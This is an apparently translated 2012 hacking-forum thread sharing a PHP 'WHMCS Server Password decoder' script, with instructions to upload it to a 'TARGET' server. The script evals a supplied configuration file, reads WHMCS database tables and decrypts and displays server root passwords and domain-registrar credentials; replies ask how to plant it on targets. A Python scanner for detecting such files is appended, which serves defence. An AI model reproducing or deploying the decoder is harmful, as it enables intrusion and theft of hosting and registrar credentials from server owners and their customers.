Scan WHM with PHP

anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Scan WHM with PHP

Post by anharku » Thu Apr 05, 2012 9:47 am

Got this from a neighboring forum; no harm in me sharing it on my beloved xcode as well.
    <?php

    ###########################################
    # WHMCS Server Password decoder #
    # Coded By RAB3OUN #
    # [email protected] #
    #Note : I'm Proud to be ~~TUNISIAN~~ #
    ###########################################



    function decrypt ($string,$cc_encryption_hash)
    {

    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
    $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
    ++$c;
    }

    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
    if (($c != 0 AND $c % $hash_length == 0))
    {
    $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
    }

    $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
    ++$c;
    }

    return $out;
    }


    function _hash ($string)
    {
    if (function_exists ('sha1'))
    {
    $hash = sha1 ($string);
    }
    else
    {
    $hash = md5 ($string);
    }

    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
    $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
    $c += 2;
    }

    return $out;
    }

    if($_POST['form_action'] == 1 )
    {
    //include($file);

    $file=($_POST['file']);
    $text=file_get_contents($file);

    $text= str_replace("<?php", "", $text);
    $text= str_replace("<?", "", $text);
    $text= str_replace("?>", "", $text);

    eval($text);

    $link=mysql_connect($db_host,$db_username,$db_password) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblservers");

    while($v = mysql_fetch_array($query)) {

    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];

    echo("<center><table border='1'>");
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>Type</td><td>$type</td></tr>");
    echo("<tr><td>Active</td><td>$active</td></tr>");
    echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
    echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
    echo("<tr><td>Username</td><td>$username</td></tr>");
    echo("<tr><td>Password</td><td>$password</td></tr>");


    echo "</table><br><br></center>";

    }

    $link=mysql_connect($db_host,$db_username,$db_password) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblregistrars");
    echo("<center>Domain Reseller <br><table border='1'>");
    echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
    while($v = mysql_fetch_array($query)) {

    $registrar = $v['registrar'];
    $setting = $v['setting'];
    $value = decrypt ($v['value'], $cc_encryption_hash);
    if ($value=="") {
    $value=0;
    }
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





    }
    echo "</table><br><br></center>";
    }



    if($_POST['form_action'] == 2 )
    {
    //include($file);

    $db_host=($_POST['db_host']);
    $db_username=($_POST['db_username']);
    $db_password=($_POST['db_password']);
    $db_name=($_POST['db_name']);
    $cc_encryption_hash=($_POST['cc_encryption_hash']);




    $link=mysql_connect($db_host,$db_username,$db_password) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblservers");

    while($v = mysql_fetch_array($query)) {

    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];

    echo("<center><table border='1'>");
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>Type</td><td>$type</td></tr>");
    echo("<tr><td>Active</td><td>$active</td></tr>");
    echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
    echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
    echo("<tr><td>Username</td><td>$username</td></tr>");
    echo("<tr><td>Password</td><td>$password</td></tr>");


    echo "</table><br><br></center>";

    }


    $link=mysql_connect($db_host,$db_username,$db_password) ;
    mysql_select_db($db_name,$link) ;

    $query = mysql_query("SELECT * FROM tblregistrars");
    echo("<center>Domain Reseller <br><table border='1'>");
    echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
    while($v = mysql_fetch_array($query)) {

    $registrar = $v['registrar'];
    $setting = $v['setting'];
    $value = decrypt ($v['value'], $cc_encryption_hash);
    if ($value=="") {
    $value=0;
    }
    $password = decrypt ($v['password'], $cc_encryption_hash);
    echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





    }
    echo "</table><br><br></center>";
    }




    ?><body bgcolor="#000000">
    <style>

    BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; color: white;}
    textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
    input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
    </style>
    <center>
    <font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server Password decoder ~~ ]</font><br><br>
    <font color="#0066FF" size='+2'>Symlink to configuration.php of WHMCS</font><br>
    </center>
    <FORM action="" method="post">
    <input type="hidden" name="form_action" value="1">
    <br>
    <input type="text" size="30" name="file" value="">
    <br>
    <INPUT class=submit type="submit" value="Submit" name="Submit">
    </FORM>
    <hr>

    <br>
    <center>
    <font color="#0066FF" size='+2'>DB configuration of WHMCS</font><br>
    </center>
    <FORM action="" method="post">
    <input type="hidden" name="form_action" value="2">
    <br>
    <table border=1>

    <tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
    <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
    <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
    <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""></td></tr>
    <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

    </table>
    <br>
    <INPUT class=submit type="submit" value="Submit" name="Submit">
    </FORM>
    <hr>
    <center>
    <font color="#0066FF" size='+2'>Password decoder</font><br>
    <?
    if($_POST['form_action'] == 3 )
    {



    $password=($_POST['password']);

    $cc_encryption_hash=($_POST['cc_encryption_hash']);


    $password = decrypt ($password, $cc_encryption_hash);

    echo("Password is ".$password);

    }
    ?>
    </center>
    <FORM action="" method="post">
    <input type="hidden" name="form_action" value="3">
    <br>
    <table border=1>

    <tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
    <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

    </table>
    <br>
    <INPUT class=submit type="submit" value="Submit" name="Submit">
    </FORM>
    <hr>


    <center> <font color="#FFFF6FF" size='+1'> Coded By RAB3OUN [email protected] </font><br><br> <center>
Save it as whmcs.php, upload it to the TARGET server, then open its URL, for example http://TARGET.COM/whmcs.php

Image
Result:
Image
Hope this is useful.
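
A defender-side check for this kind of file, as an added example that is not part of the original post: the Python below scores PHP sources for the traits visible in the script above (eval of a variable, a request-supplied file path or DB login, the `tblservers`/`tblregistrars` tables, `$cc_encryption_hash`). The indicator names, weights, threshold and both sample strings are assumptions constructed for this example.

```python
import os
import re

# Indicators taken from the script posted above; the names, weights and
# threshold are assumptions made for this example, not WHMCS guidance.
INDICATORS = {
    "reads_whmcs_secret": (re.compile(r"\$cc_encryption_hash\b"), 2),
    "queries_credential_tables": (re.compile(r"\btbl(?:servers|registrars)\b", re.I), 2),
    "eval_of_variable": (re.compile(r"\beval\s*\(\s*\$\w+\s*\)", re.I), 3),
    "file_read_of_variable": (re.compile(r"\bfile_get_contents\s*\(\s*\$\w+", re.I), 1),
    "path_from_request": (re.compile(r"\$_(?:POST|GET|REQUEST)\s*\[\s*['\"]file['\"]", re.I), 1),
    "db_login_from_request": (re.compile(
        r"\$_(?:POST|GET|REQUEST)\s*\[\s*['\"]db_(?:host|username|password|name)['\"]", re.I), 3),
}
THRESHOLD = 5  # a stock configuration.php only defines the secret and scores 2

# Constructed samples (not real files): a fragment with the posted script's
# traits, and a configuration.php-style fragment that must not be flagged.
SAMPLE_DECODER = ("<?php $f = $_POST['file']; $t = file_get_contents($f); eval($t); "
                  "$q = 'SELECT * FROM tblservers'; decrypt($row, $cc_encryption_hash);")
SAMPLE_CONFIG = "<?php $db_host = 'localhost'; $cc_encryption_hash = 'CONSTRUCTED';"

def score_php_source(text):
    """Return (score, sorted indicator names) for one PHP source string."""
    hits = sorted(name for name, (rx, _w) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[name][1] for name in hits), hits

def scan_tree(root):
    """Walk a web root and return (path, score, hits) for files at or over THRESHOLD."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    score, hits = score_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if score >= THRESHOLD:
                findings.append((path, score, hits))
    return findings

if __name__ == "__main__":
    print(score_php_source(SAMPLE_DECODER))
    print(score_php_source(SAMPLE_CONFIG))
```

A file over the threshold in a web root should be treated as evidence that `configuration.php` and the credentials stored in `tblservers` and `tblregistrars` were exposed.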

indounderground
Posts: 95
Joined: Thu Sep 07, 2006 6:14 am
Location: Somewhere underwear everywear :P

Re: Scan WHM with PHP

Post by indounderground » Thu Apr 12, 2012 1:22 pm

Where's the wordlist, bro? :)
Share that too, please.

Kournikova
Posts: 7
Joined: Wed Sep 12, 2012 10:43 am
Location: Medan

Re: Scan WHM with PHP

Post by Kournikova » Wed Sep 12, 2012 11:52 am

Whoa, my knowledge hasn't gotten that far yet, bro :lol:
Could you please share a PoC, bro?
I want to learn too.

yoga_kelana
Posts: 214
Joined: Sat Dec 29, 2007 11:58 am
Location: Banjarmasin

Re: Scan WHM with PHP

Post by yoga_kelana » Mon Dec 03, 2012 12:48 pm

Is this brute-forced, or how does it work, bro?
Or is it only for logging in to WHM, so you have to find the WHM config first? :D
Why do I keep getting more handsome :D

m1ch43lss
Posts: 10
Joined: Wed Dec 23, 2009 1:34 am

Re: Scan WHM with PHP

Post by m1ch43lss » Mon Apr 01, 2013 12:37 am

What does cc encryption hash mean?

edriajha
Posts: 4
Joined: Sat Dec 12, 2009 12:31 pm

Re: Scan WHM with PHP

Post by edriajha » Tue Jul 30, 2013 5:18 am

Bro, I'd like to ask: how do you upload the file to the target server?
